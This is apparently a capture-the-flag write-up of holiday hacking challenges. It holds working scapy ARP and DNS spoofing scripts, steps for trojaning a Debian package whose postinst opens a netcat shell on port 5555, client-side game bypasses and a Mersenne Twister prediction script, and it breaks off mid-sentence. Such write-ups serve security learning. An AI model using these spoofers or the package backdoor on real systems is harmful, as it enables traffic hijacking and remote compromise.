tcpdump and tshark are command-line packet analyzers which can sniff and capture traffic on a network interface, and which can read pcap files. Sniffing eth0 with name resolution, protocol conversion and port number conversion disabled shows a sequence of broadcast ARP (Address Resolution Protocol) requests:

~$ tshark -nni eth0 Capturing on 'eth0'1 0.000000000 4c:24:57:ab:ed:84 → ff:ff:ff:ff:ff:ff ARP 42 Who has 10.6.6.53? Tell 10.6.6.352 1.031937978 4c:24:57:ab:ed:84 → ff:ff:ff:ff:ff:ff ARP 42 Who has 10.6.6.53? Tell 10.6.6.353 2.071956679 4c:24:57:ab:ed:84 → ff:ff:ff:ff:ff:ff ARP 42 Who has 10.6.6.53? Tell 10.6.6.35...

Alabaster's host on 10.6.6.35 is looking for the ethernet (MAC) address belonging to IP address 10.6.6.53, which presumably is the default gateway. Let's see what it wants by pretending to be that gateway.

II) Spoofy

The host is performing an ARP request. Perhaps we could do a spoof to perform a machine-in-the-middle attack. I think we have some sample scapy traffic scripts that could help you in /home/guest/scripts.

⟶ An excellent introduction to the ARP protocol and ARP spoofing

The idea is to answer the ARP request with an "is-at" response, providing the host with our own MAC address in order to fool it into thinking that we are the gateway. This is only a one-sided man (or machine) in the middle attack; for the full monty, we would have to do the same to the gateway and forward any packets we are not interested in terminating. An incomplete scapy script is provided in scripts/arp_resp.py as a template for the ARP responder. After filling in the gaps (source in arp_resp_mod.py) it looks like:

ARP request: ###[ Ethernet ]### dst = ff:ff:ff:ff:ff:ff src = 4c:24:57:ab:ed:84 type = ARP###[ ARP ]### hwtype = 0x1 ptype = IPv4 hwlen = 6 plen = 4 op = who-has hwsrc = 4c:24:57:ab:ed:84 psrc = 10.6.6.35 hwdst = 00:00:00:00:00:00 pdst = 10.6.6.53 ARP response: ###[ Ethernet ]### dst = 4c:24:57:ab:ed:84 src = 02:42:0a:06:00:07 type = ARP###[ ARP ]### hwtype = 0x1 ptype = IPv4 hwlen = 6 plen = 4 op = is-at hwsrc = 02:42:0a:06:00:07 psrc = 10.6.6.53 hwdst = 4c:24:57:ab:ed:84 pdst = 10.6.6.35

#!/usr/bin/python3from scapy.all import *import netifaces as ni# Our eth0 mac addressmacaddr = ni.ifaddresses('eth0')[ni.AF_LINK][0]['addr']def handle_arp_packets(packet): # craft ARP response and send it packet.show() if ARP in packet and packet[ARP].op == 1: ether_resp = Ether(dst=packet[Ether].src, type=0x806, src=macaddr) arp_response = ARP(pdst=packet[ARP].psrc) arp_response.op = 2 arp_response.plen = packet[ARP].plen arp_response.hwlen = packet[ARP].hwlen arp_response.ptype = packet[ARP].ptype arp_response.hwtype = packet[ARP].hwtype arp_response.hwsrc = macaddr arp_response.psrc = packet[ARP].pdst arp_response.hwdst = packet[ARP].hwsrc arp_response.pdst = packet[ARP].psrc response = ether_resp/arp_response response.show() sendp(response, iface="eth0")def main(): # We only want arp requests with opcode 1 berkeley_packet_filter = "(arp[6:2] = 1)" # sniffing for one packet that will be sent to a function, while storing none sniff(filter=berkeley_packet_filter, prn=handle_arp_packets, store=0, count=1) if __name__ == "__main__": main()

An ARP request and the response it should generate are shown on the right of the listing. The scapy function sniff in main() waits until a packet matches the filter, then calls a handler handle_arp_packets with the packet as payload and exits after the first match. The filter uses the berkeley packet filter syntax to check for a packet having an ARP layer with opcode 1 (bytes 6-7), indicating a request. The handler then sets up an Ethernet layer packet of type 0x806 (the ARP ether type) with our own MAC address as source and the requestors MAC as destination. The ARP layer is generated by copying items from the request packet, exchanging source and destination. Setting op = 2 (reply, 'is-at') and hwsrc = macaddr (our own MAC address) completes the packet.

While experimenting, it is a pain to modify the template using vim every time the terminal times out. Because copy and paste is supported by this Tmux terminal, it is possible to edit files at home, convert them to base64 and then to simply paste that into the terminal:

~$ echo IyEvd ... <base64 of file> ... 4oKQ== | base64 -d > arp_resp_mod.py

Tmux proves very useful when testing the ARP responder: we can run tshark in one pane to observe what happens and then start the ARP responder in another one. The packet capture

...15 13.507956839 4c:24:57:ab:ed:84 → ff:ff:ff:ff:ff:ff ARP 42 Who has 10.6.6.53? Tell 10.6.6.3516 13.535988961 02:42:0a:06:00:03 → 4c:24:57:ab:ed:84 ARP 42 10.6.6.53 is at 02:42:0a:06:00:0317 13.572752158 10.6.6.35 → 10.6.6.53 DNS 74 Standard query 0x0000 A ftp.osuosl.org18 14.555932719 4c:24:57:ab:ed:84 → ff:ff:ff:ff:ff:ff ARP 42 Who has 10.6.6.53? Tell 10.6.6.35...

shows that the host accepted the spoofed gateway MAC and now hurls a DNS query at us, demanding to find the IP address of an ftp server.

III) Resolvy

Hmmm, looks like the host does a DNS request after you successfully do an ARP spoof. Let's return a DNS response resolving the request to our IP.

Same procedure as before: we reply to the DNS query with an answer pointing at our real IP address, 10.6.0.7, and see what comes next. Again, a template is provided in scripts/dns_resp.py, waiting to be filled in. This time, however, the entire DNS layer is missing, leaving much room for frustration and error because the host turns out to be quite particular about its answers. To help along, example pcap files are provided in the pcaps directory. With the gaps filled in (source in dns_resp_mod.py):

DNS query: ###[ DNS ]### id = 0 qr = 0 opcode = QUERY aa = 0 tc = 0 rd = 1 ra = 0 z = 0 ad = 0 cd = 0 rcode = ok qdcount = 1 ancount = 0 nscount = 0 arcount = 0 \qd \ |###[ DNS Question Record ]### | qname = 'ftp.osuosl.org.' | qtype = A | qclass = IN an = None ns = None ar = None DNS response: ###[ DNS ]### id = 0 qr = 1 opcode = QUERY aa = 1 tc = 0 rd = 1 ra = 1 z = 0 ad = 0 cd = 0 rcode = ok qdcount = 1 ancount = 1 nscount = 0 arcount = 0 \qd \ |###[ DNS Question Record ]### | qname = 'ftp.osuosl.org.' | qtype = A | qclass = IN \an \ |###[ DNS Resource Record ]### | rrname = 'ftp.osuosl.org.' | type = A | rclass = IN | ttl = 60 | rdlen = None | rdata = 10.6.0.7 ns = None ar = None

#!/usr/bin/python3from scapy.all import *import netifaces as ni# Our eth0 IPipaddr = ni.ifaddresses('eth0')[ni.AF_INET][0]['addr']# Our Mac Addrmacaddr = ni.ifaddresses('eth0')[ni.AF_LINK][0]['addr']# destination ip we arp spoofedipaddr_we_arp_spoofed = "10.6.6.53"def handle_dns_request(packet): # Craft DNS answer and send it packet.show() eth = Ether(src=packet[Ether].dst, dst=packet[Ether].src) ip = IP(dst=packet[IP].src, src=packet[IP].dst) udp = UDP(dport=packet[UDP].sport, sport=packet[UDP].dport) dns = DNS( id=packet[DNS].id, qr=1, aa=1, rd=1, ra=1, qdcount=1, ancount=1, qd=packet[DNS].qd, an=DNSRR( rrname=packet[DNSQR].qname, rdata=ipaddr, ttl=60 ) ) dns_response = eth / ip / udp / dns dns_response.show() sendp(dns_response, iface="eth0") def main(): berkeley_packet_filter = " and ".join( [ "udp dst port 53", # dns "udp[10] & 0x80 = 0", # dns request "dst host {}".format(ipaddr_we_arp_spoofed), # destination ip we had spoofed (not our real ip) "ether dst host {}".format(macaddr) # our macaddress since we spoofed the ip to our mac ] ) # sniff the eth0 int without storing packets in memory and stopping after one dns request sniff(filter=berkeley_packet_filter, prn=handle_dns_request, store=0, iface="eth0", count=1) if __name__ == "__main__": main()

To the right of the listing, the DNS query sent by the host and the generated response are shown (only the DNS layer; the full packet structure is here). The DNS responder functions in a similar way as the ARP responder, with a more complex filter to keep the focus tight. The different layers of the response packet are constructed from top down and only combined at the end. The fields in the DNS layer have to be set carefully:

qr = 1 to indicate a response

aa = 1 to indicate an authoritative answer :-)

rd = 1 and ra = 1 because the query demanded recursion

qdcount = 1 and ancount = 1 (one question, one answer)

id (identifyer) and qd (DNS question record) as in the query

an = new resource record to contain our answer

The constructor of the scapy DNS resource record class DNSRR does most of the work, we just need to set rrname to the name of the queried resource, and rdata to our own IP address (not the spoofed one, that fails).

To try out the DNS responder, first start a packet capture, then (in a separate pane) the DNS responder and finally in a third pane the ARP responder. The (tshark) protocol shows a flurry of packets after the DNS response:

6 5.231959239 4c:24:57:ab:ed:84 → ff:ff:ff:ff:ff:ff ARP 42 Who has 10.6.6.53? Tell 10.6.6.35 7 6.291981985 4c:24:57:ab:ed:84 → ff:ff:ff:ff:ff:ff ARP 42 Who has 10.6.6.53? Tell 10.6.6.35 8 6.324077291 02:42:0a:06:00:07 → 4c:24:57:ab:ed:84 ARP 42 10.6.6.53 is at 02:42:0a:06:00:07 9 6.352963129 10.6.6.35 → 10.6.6.53 DNS 74 Standard query 0x0000 A ftp.osuosl.org 10 6.385000826 10.6.6.53 → 10.6.6.35 DNS 104 Standard query response 0x0000 A ftp.osuosl.org A 10.6.0.7 11 6.390995509 02:42:0a:06:00:07 → ff:ff:ff:ff:ff:ff ARP 42 Who has 10.6.6.35? Tell 10.6.0.7 12 6.391112256 4c:24:57:ab:ed:84 → 02:42:0a:06:00:07 ARP 42 10.6.6.35 is at 4c:24:57:ab:ed:84 13 6.391116580 10.6.0.7 → 10.6.6.35 TCP 74 51978 → 64352 [SYN] Seq=0 Win=64240 Len=0 MSS=1460 SACK_PERM=1 TSval=2813365991 TSecr=0 WS=12814 6.391164757 10.6.6.35 → 10.6.0.7 TCP 74 64352 → 51978 [SYN, ACK] Seq=0 Ack=1 Win=65160 Len=0 MSS=1460 SACK_PERM=1 TSval=1481426581 TSecr=2813365991 WS=12815 6.391182511 10.6.0.7 → 10.6.6.35 TCP 66 51978 → 64352 [ACK] Seq=1 Ack=1 Win=64256 Len=0 TSval=2813365991 TSecr=148142658116 6.393919961 10.6.0.7 → 10.6.6.35 TLSv1 583 Client Hello17 6.393972008 10.6.6.35 → 10.6.0.7 TCP 66 64352 → 51978 [ACK] Seq=1 Ack=518 Win=64768 Len=0 TSval=1481426584 TSecr=281336599418 6.396093054 10.6.6.35 → 10.6.0.7 TLSv1.3 1579 Server Hello, Change Cipher Spec, Application Data, Application Data, Application Data, Application Data19 6.396107363 10.6.0.7 → 10.6.6.35 TCP 66 51978 → 64352 [ACK] Seq=518 Ack=1514 Win=64128 Len=0 TSval=2813365996 TSecr=148142658620 6.396664690 10.6.0.7 → 10.6.6.35 TLSv1.3 146 Change Cipher Spec, Application Data21 6.396974273 10.6.6.35 → 10.6.0.7 TLSv1.3 321 Application Data22 6.397063741 10.6.0.7 → 10.6.6.35 TLSv1.3 278 Application Data23 6.397092303 10.6.6.35 → 10.6.0.7 TLSv1.3 321 Application Data24 6.402606855 10.6.6.35 → 10.6.0.7 TCP 74 48442 → 80 [SYN] Seq=0 Win=64240 Len=0 MSS=1460 SACK_PERM=1 TSval=1481426593 TSecr=0 WS=128 25 6.402631706 10.6.0.7 → 10.6.6.35 TCP 54 80 → 48442 [RST, ACK] Seq=1 Ack=1 Win=0 Len=0 26 6.403934015 10.6.6.35 → 10.6.0.7 TLSv1.3 286 Application Data, Application Data, Application Data27 6.404951375 10.6.0.7 → 10.6.6.35 TCP 66 51978 → 64352 [ACK] Seq=810 Ack=2245 Win=64128 Len=0 TSval=2813366005 TSecr=148142658728 6.405071504 10.6.0.7 → 10.6.6.35 TCP 66 51978 → 64352 [FIN, ACK] Seq=810 Ack=2245 Win=64128 Len=0 TSval=2813366005 TSecr=148142658729 6.405096223 10.6.6.35 → 10.6.0.7 TCP 66 64352 → 51978 [ACK] Seq=2245 Ack=811 Win=64640 Len=0 TSval=1481426595 TSecr=281336600530 7.356018081 4c:24:57:ab:ed:84 → ff:ff:ff:ff:ff:ff ARP 42 Who has 10.6.6.53? Tell 10.6.6.35 31 8.411950892 4c:24:57:ab:ed:84 → ff:ff:ff:ff:ff:ff ARP 42 Who has 10.6.6.53? Tell 10.6.6.35

Most of this is inpenetrable TLS, but an attempt to address port 80 looks interesting (sequence number 24, 25). This port is generally used for HTTP, so let's set up an HTTP server to listen on it. The hints in HELP.md suggest using http.server, a very simple but user friendly python module which is quite sufficient for our purposes. In a fourth Tmux pane, create and change to a new directory server/ and start the HTTP server there. Now that port 80 is open, the same ARP / DNS procedure as before leads to a HTTP GET request sent to the server:

~$ mkdir server ~$ cd server ~/server$ python3 -m http.server 80 Serving HTTP on 0.0.0.0 port 80 (http://0.0.0.0:80/) ... 10.6.6.35 - - [28/Dec/2020 21:38:38] code 404, message File not found 10.6.6.35 - - [28/Dec/2020 21:38:38] " GET /pub/jfrost/backdoor/suriv_amd64.deb HTTP/1.1" 404 -

So, Jack Frost tries to download the debian package suriv_amd64.deb from the directory /pub/jfrost/backdoor/. Sounds veeeeery nefarious. But, it is christmas, the festival of giving, so lets give him something.

~/server$ mkdir -p pub/jfrost/backdoor ~/server$ touch pub/jfrost/backdoor/suriv_amd64.deb ~/server$ python3 -m http.server 80 Serving HTTP on 0.0.0.0 port 80 (http://0.0.0.0:80/) ... 10.6.6.35 - - [28/Dec/2020 21:46:42] "GET /pub/jfrost/backdoor/suriv_amd64.deb HTTP/1.1" 200 -

Jacks host swallows the (currently empty) bait and hopefully tries to install it! This can be verified via a packet capture. The final step is to fill our present with something tasty.

IV) Embedy

The malware on the host does an HTTP request for a .deb package. Maybe we can get command line access by sending it a command in a customized .deb file

⟶ Detailed description of how to place a trojan in a debian package.

The page linked by the hint gives step-by-step instructions on how to hide a reverse TCP shell inside an otherwise legitimate debian package. Messing around with Meterpreter would be a possibility if Metasploit was installed, but we have a simple alternative: amongst other goodies, the debs directory contains a package for netcat, which can be set up as reverse shell. The perfect present for a connisseur such as Jack. Following instructions to pull apart the deb package:

~$ mkdir packing ~$ cp debs/netcat-traditional_1.10-41.1ubuntu1_amd64.deb packing ~$ cd packing/ ~/packing$ dpkg -x netcat-traditional_1.10-41.1ubuntu1_amd64.deb work ~/packing$ mkdir work/DEBIAN ~/packing$ ar -x netcat-traditional_1.10-41.1ubuntu1_amd64.deb ~/packing$ tar -Jxvf control.tar.xz ./control ./control~/packing$ tar -Jxvf control.tar.xz ./postinst ./postinst~/packing$ mv control work/DEBIAN/ ~/packing$ mv postinst work/DEBIAN/

The work directory now contains the package contents (usr and bin subdirectories) as well as the control and postint files of the package. postint executes after the installation and represents our attack vector. We just need to add a line instructing the freshly installed netcat to open a reverse shell and listen to port 5555 (for example):

~/packing$ echo " nc -n -v -l -p 5555 -e /bin/bash " >> work/DEBIAN/postinst

This is all, no further payload is required. Now everything has to be repacked with dpkg-deb and renamed to the package Jack Frost wants:

~/packing$ dpkg-deb --build ./work/ ~/packing$ mv work.deb ~/server/pub/jfrost/backdoor/suriv_amd64.deb

Now that our present is in place, we can restart the web server in ~/server, the DNS responder and the ARP responder again and wait for the download to happen. After allowing a short time for the remote install to finish, we can connect to the remote shell and control the host:

~$ nc -nv 10.6.6.35 5555

The desired document /NORTH_POLE_Land_Use_Board_Meeting_Minutes.txt can be read without further obstacles and shows Jack Frost at his best, as a fearless community leader concerned about reckless development and building activity in the fragile North Pole environment. The document shows that Tanta Kringle recused herself from the vote on the construction plans, and everyone else (except Jack Frost) approved. Very fishy if you ask me ... how much pressure did Santa bring to bear? Has he succumbed to the dark side? Maybe a story for next year ...

Terminal 10: The Elf Code

Ribb Bonbowford: Hello - my name is Ribb Bonbowford. Nice to meet you! Are you new to programming? It's a handy skill for anyone in cyber security. This challenge centers around JavaScript. Take a look at this intro and see how far it gets you! Ready to move beyond elf commands? Don't be afraid to mix in native JavaScript. Trying to extract only numbers from an array? Have you tried to filter? Maybe you need to enumerate an object's keys and then filter? Getting hung up on number of lines? Maybe try to minify your code. Is there a way to push array items to the beginning of an array? Hmm...

⟶ Two useful commands: filter and typeof

⟶ JavaScript code compression

This game is about moving around a wintery landscape, avoiding munchkins and pits and solving mini-challenges (levers and munchkins) by writing and executing a JavaScript control code. Apart from the usual JS commands, there are a number of elf commands which control movement and interaction. For each level, the task is to gather all lollipops and get to the gate within a maximum number of lines of code and a maximum number of elf commands. To solve the terminal challenge, it is sufficient to complete the first 6 levels, but 2 more challenges await thereafter ...

The table below lists for each level the level map, the requirements, tasks and solutions:

Level Code Restrictions Map Tasks / Comments 1 elf.moveLeft(10);

elf.moveUp(10); 2 lines code,

2 elf cmds 2 elf.moveTo(lever[0]);

elf.pull_lever(elf.get_lever(0) + 2);

elf.moveLeft(4);

elf.moveUp(10); 5 lines code,

5 elf cmds Trigger The Yeeter

lever #0: add 2 to lever value 3 for (var i = 0; i < 3; i++) {

elf.moveTo(lollipop[i]);

}

elf.moveUp(1); 4 lines code,

4 elf cmds Move To Loopiness

Cannot meet restriction without a loop 4 for (var i = 0; i < 5; i++) {

elf.moveTo(lollipop[0]);

elf.moveUp(11);

} 7 lines code,

6 elf cmds Up Down Loopiness

This code is short at the cost of some unnecessary paths. 5 elf.moveTo(lollipop[1]);

elf.moveTo(lollipop[0]);

var arr = elf.ask_munch(0);

elf.tell_munch(arr.filter(elem =>

typeof(elem) === 'number'));

elf.moveUp(2); 10 lines code,

5 elf cmds Move To Madness

Munchkin #0: return array of numbers from mixed array given by munchkin. This is achieved by filtering by type. 6 for (var i = 0; i < 4; i++) {

elf.moveTo(lollipop[i]);

}

elf.moveLeft(8);

elf.moveUp(2);

var munch = elf.ask_munch(0)

var answer = Object.keys(munch).find(key =>

munch[key] === "lollipop");

elf.tell_munch(answer);

elf.moveUp(2); 15 lines code,

7 elf cmds Two Paths, Your Choice

Choose to answer either the lever or the munchkin. Munchkin #0: given a JSON object, return the key with the value "lollipop". 7 function sum_array(arr_1) {

var sum = 0;

function add_item(item)

if (typeof(item) === 'number')

sum += item;

arr_1.forEach(arr2 =>

arr2.forEach(add_item))

return sum

}

var move = [elf.moveLeft, elf.moveUp,

elf.moveRight, elf.moveDown];

elf.moveDown(1);

for (var n = 0; n < 7; n++) {

elf.pull_lever(n);

move[n % 4](n + 2);

}

elf.moveUp(2);

elf.moveLeft(4);

elf.tell_munch(sum_array);

elf.moveUp(2);

25 lines code,

10 elf cmds Yeeter Swirl (Bonus)

Lever #n needs to get pulled with elf.pull_lever(n) Munchkin #0 requires a function which takes a mixed array of arrays as argument and returns the sum of the numeric elements. This could also be solved by adapting the filter from question 5 (remembered too late). To manage the spirally motion, I defined an array of the 4 directional elf movemenst and used the spiral index to select the correct element. 8 function find_lolli_json(j_arr) {

for (key in j_arr)

if (j_arr[key] === "lollipop")

return key

return null

}

function find_lolli(arr) {

for (i in arr) {

sol = find_lolli_json(arr[i]);

if (sol)

return sol

}

}

var move = [elf.moveRight, elf.moveLeft];

var lever_sum = 0

for (var n = 0; n < 6; n++) {

move[n % 2](2 * n + 1)

lever_sum += elf.get_lever(n)

elf.pull_lever(lever_sum)

elf.moveUp(2)

}

elf.tell_munch(find_lolli)

elf.moveRight(11) 40 lines code,

10 elf cmds For Loop Finale (Bonus)

Lever #n requires the sum of its own and all previous lever values. Munchkin #0 requires a function which takes an array of JSON objects, finds the object containing a key with value "lollipop" and returns that key. Again, using the approach from question 6 would have been more elegant. The loop construction for walking back and forth is very similar to that from the previous question.

Solving the bonus levels gave a nice achievement on top of Ribb's undying admiration. What more could one want? Well, there is this nagging desire to cheat anyway, even if this game is far too nice for cheating.

The first level of the game has an URL like

https://elfcode.kringlecastle.com/level1/? resourceId =94d0a6e9-9a43-4df2-a61e-6f0a9a0c564d

containing a resourceId parameter, which is presumably used to link the game results to the player. The game mechanics is handled in a javascript file called index.js, which is adapted specifically for each level. For our purposes, the function win_or_lose() is of interest:

win_or_lose() { if (!this.dead && this.game_grid[ this.cur_xy.y ][ this.cur_xy.x ] === 4) { if (this.lollipop_coords.length) { ctx.drawImage( this.fail, 0, 0); canvas.onclick = function() { canvas.onclick = null; EnableDisableBtn(); _elphgame = new Game(); } } else { ctx.drawImage( this.win, 0, 0); this.draw_numof_funcs_used() canvas.onclick = function() { eval(atob(" d2luZG93Lmx ... ZXNvdXJjZUlk ")) } } return true; } else if (this.alpha < 0) { ctx.drawImage( this.lose, 0, 0); canvas.onclick = function() { canvas.onclick = null; EnableDisableBtn(); _elphgame = new Game(); } return true; } return false;}

A base64 encoded command is evaluated, obviously to hide something, and decoding it reveals the URL of the next level:

window.location.href = '/level2_8465456214260765/?resourceId=' + resourceId

Calling this URL with the same resourceID parameter as for level 1 fast forwards to level 2. During a "normal" completion of the level no additional message exchange was detected, so this seems to be enough to convince the server that level 1 was properly solved. Rinse and repeat until level 6. Here, an additional encoded line appears above the level transition, which decodes to:

__POST_RESULTS__({hash: CryptoJS.enc.Hex.stringify(CryptoJS.HmacSHA256(resourceId + ":YouWonTheGame", "cd2bf9ed19bebeb7f6110d27eb733386")),resourceId: resourceId, action: "YouWonTheGame"})

and posts the solution of the game to the server. I was unable to verify this because I had solved the game already, but spoofing this POST should complete the challenge.

Objective 10: Defeat Fingerprint Sensor

Difficulty: 3

Bypass the Santavator fingerprint sensor. Enter Santa's office without Santa's fingerprint.

Ribb Bonbowford: Wow - are you a JavaScript developer? Great work! Hey, you know, you might use your JavaScript and HTTP manipulation skills to take a crack at bypassing the Santavator's S4. Sparkle Redberry: To get to different floors, you'll need to power the various colored receivers. ... There MAY be a way to bypass the S4 stream.

I) Santavator mechanism

Time to take a closer look at the inner workings of the Santavator. When opening the terminal inside the elevator, an application https://elevator.kringlecastle.com is opened in an iframe and fed various bits of gamestate information via the request URL. Several scripts are loaded, including:

the physics engine planck.js used by the game to model the S4 particle stream,

the game script app.js (version with with extra comments),

(version with with extra comments), a helper script conduit.js dealing with client-server communication.

Each particle in the S4 stream is modelled individually, interacting with the different obstacles until going off-screen, being captured by a trap or expiring of old age (timeout). The game mechanics takes place entirely on the client side, which opens the door to abuse ...

The communication between client and server employs both HTTP and web sockets. Entering new areas including the elevator is communicated via web socket. The elevator panel then triggers a GET request starting the game which carries all the relevant elevator tokens. This GET request also carries a resource ID which was previously provided via websocket, probably to insure that the tokens are not meddled with.

Within app.js, an animation callback function render(newtime) handles the generation and tracking of each light particle, including the interaction with coloured bulbs, obstacles, portals and traps. When correctly coloured particles enter the capture area of a trap, they slowly fill the trap (more about this later). Buttons gain the powered attribute once the traps of the required colours are sufficiently filled. Each of the elevator buttons has an associated event listener which sends sends of a POST request if it is clicked while powered, except button 4 which requires a bit more. This POST request returns a HMAC if the server deems it legitimate, and finally the client sends a "COMPLETE_CHALLENGE" web socket message requesting floor change, including this HMAC for legitimisation.

II) Beating the fingerprint sensor

Button 4 (lvl 3, Santas office) is a bit special: if clicked while powered, it opens the cover of the fingerprint sensor, which triggers a floor change process if the besanta token is present. This token is set at application start if the elevator is entered while possessing Santa (santamode).

const handleBtn4 = () => { const cover = document.querySelector('.print-cover'); cover.classList.add('open'); cover.addEventListener('click', () => { if (btn4.classList.contains(' powered ') && hasToken('besanta') ) { $.ajax({ // jQuery function type: 'POST', url: POST_URL, dataType: 'json', contentType: 'application/json', data: JSON.stringify({ targetFloor: '3', id: getParams.id, }), success: (res, status) => { // Callback executed upon success if (res.hash) { __POST_RESULTS__({ // This is defined in conduit.js resourceId: getParams.id || '1111', hash: res.hash, action: 'goToFloor-3', }); } } }); } else { __SEND_MSG__({ type: 'sfx', filename: 'error.mp3', }); } });};

To bypass this security mechanism while not being Santa, one could try to intercept and play with the HTTP or web socket messages, taking care to include the correct IDs and hashes. This is quite cumbersome. A much simpler approach is to add the besanta token from the browser console while the app is running. To do this:

Enter the elevator while not being Santa, and open the elevator panel, starting the elevator app. Invoke a JavaScript debugger, for example from Firefox developer tools. Place a breakpoint anywhere within the animation callback function render(newtime) , for example at the line requestAnimationFrame(render); Execute the command tokens.push("besanta") from the web console Remove the breakpoint and continue the interrupted process. Pressing the 3rd floor button and the fingerprint sensor now sends you to Santas office, provided the button is powered correctly.

This solves the objective.

III) Bypassing the S4 stream

Ribb and Sparkle both mentioned that the Santavator S4 bus can probably be bypassed altogether. While the game is fun to solve normally, cheating is a great temptation, even at the price of amassing naughty points. Well, we could always do a Jack Frost to handle that .... but I digress. The key elements controlling the button behaviour are the three coloured traps. In the main animation loop, each particle is checked whether it strayed within the capture area of a trap. If it is of the correct colour, the current timestamp is added to the PARTICLE_COUNTS array associated with this trap

TRAPS.forEach((points, trapIndex) => { if (vecInRect(planck.Vec2(x, y), points[0].x, points[0].y, points[2].x, points[2].y)) { if (body.color === trapIndex) PARTICLE_COUNTS[trapIndex].push(window.performance.now()); world.destroyBody(body); }});

This array is pruned regularly to filter out timestamps older than 3 seconds:

const pruneCounts = () => { PARTICLE_COUNTS.forEach((count, countIndex) => { PARTICLE_COUNTS[countIndex] = count.filter(item => { return window.performance.now() - item < 3000 }); });};

When the traps are rendered, the PARTICLE_COUNT of each trap is compared to the trapTargetCounts . The fill level is shown by lighting wire-elements, and when the trap is full, its associated LED is lit and the appropriate buttons are powered.

const renderTraps = () => { TRAPS.forEach((points, index) => { const fillLevel = pl.Math.clamp(PARTICLE_COUNTS[index].length / trapTargetCounts[index], 0, 1); const steppa = Math.floor(fillLevel / (1 / wireSteps[index])); wireElements[index].style.backgroundPosition = `0 ${ -wireElements[index].clientHeight * steppa }px`; ledElements[index].classList[fillLevel === 1 ? 'add' : 'remove']('on'); powered[index] = fillLevel === 1; }); btn1.classList[powered[2] ? 'add' : 'remove']('powered'); btn3.classList[powered[2] ? 'add' : 'remove']('powered'); btn2.classList[powered[2] && powered[0] && hasToken('workshop-button') ? 'add' : 'remove']('powered'); btnr.classList[powered[2] && powered[0] ? 'add' : 'remove']('powered'); btn4.classList[powered[2] && powered[1] && powered[0] ? 'add' : 'remove']('powered');};

In order to bypass the S4 stream, all we need to do is persuade all traps that they are full, by filling all PARTICLE_COUNTS arrays with timestamps from the future (60 seconds should be enough). The procedure is similar to part II): Start the app by opening the elevator panel, use a debugger to interrupt the app inside the animation loop, and use the web console to inject the 3 lines

PARTICLE_COUNTS[0] = new Array(20).fill(window.performance.now() + 1000*60);PARTICLE_COUNTS[1] = new Array(30).fill(window.performance.now() + 1000*60);PARTICLE_COUNTS[2] = new Array(10).fill(window.performance.now() + 1000*60);

All buttons should now be lit and the elevator fully functional.

Terminal 11: Snowball Game

Tangle Coalbox: Howdy gumshoe. I'm Tangle Coalbox, resident sleuth in the North Pole. If you're up for a challenge, I'd ask you to look at this here Snowball Game. We tested an earlier version this summer, but that one had web socket vulnerabilities. This version seems simple enough on the Easy level, but the Impossible level is, well... I'd call it impossible, but I just saw someone beat it! I'm sure something's off here. Could it be that the name a player provides has some connection to how the forts are laid out? Knowing that, I can see how an elf might feed their Hard name into an Easy game to cheat a bit. But on Impossible, the best you get are rejected player names in the page comments. Can you use those somehow? Check out Tom Liston's talk for more info, if you need it. as Santa: Howdy Boss. You look a tad flushed. Can I get you some water from the vending machine? I'm still looking into the Snowball Game like you asked. I read the write-up of the test completed earlier this summer with the web socket vulnerabilities. I was able to complete the Easy level, but the Impossible level is, umm... I'd call it impossible, but I just saw someone beat it! Is it possible that the name a player provides influences how the forts are laid out? Oh, oh, maybe if I feed a Hard name into an Easy game I can manipulate it! UGH! on Impossible, the best I get are rejected player names in the page comments... maybe that's useful? I'll have to re-watch Tom Liston's talk again. Thanks for all the tips and encouragement Santa!

⟶ Talk by Tom Liston about Mersenne Twisters

⟶ Python module for pseudo random number generation: random

⟶ Predictor by kmyk for random numbers generated with a Mersenne Twister algorithm

⟶ Stand-alone instance of the Snowball Game

The game is quite similar to battleship, a classic pen-and-paper game which was great fun during boring lessons in school. Both sides have a snow fort on a 10x10 grid, which consists of 5 wall elements of sizes 5, 4, 3, 3, 2 and is supposedly invisible to the opponent. Alternate snowball throws are traded, and if a wall is hit, a red splash appears. Whoever destroys the enemy fort first, wins. At easy level, the computer enemy throws entirely randomly and is easy to beat. At hard, roughly half of the enemy throws are hits, making the game (yes) hard to beat, and on impossible, every enemy throw scores a hit. It is pretty evident that the so-called AI cheats, so let's return the favour and kick its behind.

The javascript game code relies heavily on web sockets communication to convey game information and deals only with the rendering of the game, while state and logic are handled by server side code. A protocol of the web socket messages exchanged confirms that the only board layout appearing is that of the player being sent to the server. Incidentally, in standalone mode the game sets the player ID to "HughRansomDrysdale", the evil grandson in "Knives out". Good film that! Anyway, no easy pickings here.

In his speech, Tangle Coalbox offers the conjecture that the player name somehow encodes the fort layout. This is easily confirmed: starting two instances of the game with the same numeric player name produces the same player fort layout, and playing along a bit shows that the enemy forts are also identical. This makes it easy to beat the game on hard:

Start the game from Kringlecon (in an iframe) on hard. The player name cannot be chosen on hard, the game picks it for you. However, the name does get shown on the player game board (the green background field) Open a second instance of the game (https://snowball2.kringlecastle.com), set level to easy and fill in the player name from step 1. Beat the game on easy, and take a screenshot of the enemy fort layout before the victory screen wipes it. Use that to beat the original game on hard. The AI will never know what hit it!

This felt good, but unfortunately does not help with impossible, because the player name is redacted there. However, the HTML source shows a peculiarity: a comment with a long list full of player names rejected because they were "not random enough":

<!-- Seeds attempted: 3090549483 - Not random enough 128121106 - Not random enough 781881482 - Not random enough 1368729342 - Not random enough 3998736224 - Not random enough ... 624 rejects ... 3322170598 - Not random enough 48239589 - Not random enough 3425887652 - Not random enough <Redacted!> - Perfect! -->

So, it appears that the player name is generated randomly as 32 bit integer, and that the fort layouts are derived from this number. This can be exploited provided the random player name is generated using a MT19937 Mersenne Twistor based PRNG (pseudo random number generator), very common in most non-cryptographic implementations. MT19937 produces statistically very well distributed pseudo random numbers, but suffers from the weakness that it is completely predictable after 624 consecutive calls, regardless of the original seed. This makes it completely unsuitable for cryptographic applications such as salts and nonces (see below).

The python code below (mersenne.py) uses the MT19937 predictor module by Kimiyuki Onaka (kmyk) available from his github page. It reads a list of 624 rejected user values copied straight from the snowball game source code comment, and computes the next random 32-bit integer, which should be the equal to the redacted "perfect" user name from the list.

from mt19937predictor import MT19937Predictorpredictor = MT19937Predictor()with open("seeds.txt", "r") as fh: seeds_raw = fh.readlines()seeds = [int(s.split()[0]) for s in seeds_raw]print("Number of seeds:", len(seeds))for s in seeds: predictor.setrand_int32(s)print("Next seed:", predictor.genrand_int32())

So, the exploit goes as follows:

